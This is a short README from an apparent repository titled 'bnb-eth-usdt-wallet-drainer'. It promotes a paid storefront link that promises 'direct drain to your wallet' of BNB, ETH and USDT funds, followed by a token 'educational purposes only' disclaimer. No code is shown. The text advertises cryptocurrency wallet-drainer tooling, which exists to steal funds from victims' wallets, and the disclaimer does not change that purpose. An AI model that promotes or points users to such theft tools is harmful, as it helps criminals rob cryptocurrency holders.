xxxKEKxxx/bnb-eth-usdt-wallet-drainer/README.md

+!!!!!!!For direct drain to your wallet with no custom smart contract https://moneywithbots.sellix.io/ !!!!!!!!!!!!!

 !!!!!!!!!!!Please only use this for educational purposes not too hack others Please use for testing or educational purposes only !!!!!!!!!!!!